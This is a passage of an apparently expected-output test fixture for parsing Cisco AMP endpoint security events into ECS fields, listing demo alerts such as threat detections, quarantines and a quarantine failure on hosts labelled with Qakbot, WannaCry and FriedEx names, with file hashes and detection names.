+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
+                "kind": "alert",
+                "action": "Threat Detected in Low Prevalence Executable",
+                "id": "1458626002840536600",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "df:d1:ed:2d:c8:fc",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "df:d1:ed:2d:c8:fc"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 1107296278
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:19:10.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_MAP_FriedEx"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_MAP_FriedEx",
+                "hostname": "Demo_AMP_MAP_FriedEx"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:32:23.854011760Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6583861114428195000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "04:e6:4d:d5:7a:b5",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "04:e6:4d:d5:7a:b5"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:11:04.000Z",
+            "file": {
+                "name": "report.pdf.exe",
+                "path": "\\\\?\\C:\\Users\\rsteadman\\Downloads\\report.pdf.exe",
+                "hash": {
+                    "sha1": "5058b16a86beee96927371210b9a9f682976a50a",
+                    "sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b",
+                    "md5": "48a0bf05b9706a00d2a0ff6260412f11"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Low_Prev_Retro"
+                ],
+                "hash": [
+                    "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b",
+                    "48a0bf05b9706a00d2a0ff6260412f11",
+                    "5058b16a86beee96927371210b9a9f682976a50a"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Low_Prev_Retro",
+                "hostname": "Demo_Low_Prev_Retro"
+            },
+            "event": {
+                "severity": 0,
+                "ingested": "2021-09-12T17:32:23.854013646Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}",
+                "kind": "alert",
+                "action": "File Fetch Completed",
+                "id": "6264747552596296000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "df:d1:ed:2d:c8:fc",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "df:d1:ed:2d:c8:fc"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648173
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "wscript.exe",
+                "pid": 4744,
+                "hash": {
+                    "sha1": "2131cff0959d213cd9a5e8a8ac362d265d5b1316",
+                    "sha256": "9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97",
+                    "md5": "045451fa238a75305cc26ac982472367"
+                }
+            },
+            "@timestamp": "2021-01-14T12:02:58.000Z",
+            "file": {
+                "name": "X4.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\Documents\\X4.exe",
+                "hash": {
+                    "sha1": "c235e18bae63d6c4b5daadb833686f943de65a5f",
+                    "sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62",
+                    "md5": "a659ff79ef7ffacbd61d4c2641379e44"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_Qakbot_2"
+                ],
+                "hash": [
+                    "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62",
+                    "a659ff79ef7ffacbd61d4c2641379e44",
+                    "c235e18bae63d6c4b5daadb833686f943de65a5f"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_2",
+                "hostname": "Demo_Qakbot_2",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854015534Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6411444887895409000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "Auto.A280012EEE.in10.tht.Talos",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "d1:e2:b6:61:ef:7a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Clean",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "d1:e2:b6:61:ef:7a"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411444887895408641",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T12:02:58.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_2"
+                ],
+                "hash": [
+                    "a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_Qakbot_2",
+                "hostname": "Demo_Qakbot_2"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854017516Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}",
+                "kind": "alert",
+                "action": "Threat Quarantined",
+                "id": "6411444887895409000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "d1:e2:b6:61:ef:7a",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "d1:e2:b6:61:ef:7a"
+                        ]
+                    },
+                    "detection_id": "6411444887895408641",
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648143
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:58:57.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854019384Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Quarantine Failure",
+                "id": "6419187549993959000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419187549993959449",
+                    "event_type_id": 2164260880
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 2980,
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "@timestamp": "2021-01-14T11:58:57.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\WINDOWS\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854021268Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419187549993959000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419187549993959449",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "mssecsvc.exe",
+                "pid": 2980,
+                "hash": {
+                    "sha1": "e889544aff85ffaf8b0d0da705105dee7c97fe26",
+                    "sha256": "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c",
+                    "md5": "db349b97c37d22f5ea1d1841e3c89eb4"
+                }
+            },
+            "@timestamp": "2021-01-14T11:58:54.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha1": "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467",
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "md5": "84c82835a5d21bbcf75a61706d8ab549"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa",
+                    "84c82835a5d21bbcf75a61706d8ab549",
+                    "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware",
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "user": {
+                    "name": "user@testdomain.com"
+                }
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854023153Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "kind": "alert",
+                "action": "Threat Detected",
+                "id": "6419187537109058000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.File.MalParent",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "parent": {
+                            "disposition": "Malicious",
+                            "identity": {}
+                        },
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419187537109057560",
+                    "event_type_id": 1090519054
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T11:58:54.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 2,
+                "ingested": "2021-09-12T17:32:23.854025059Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat 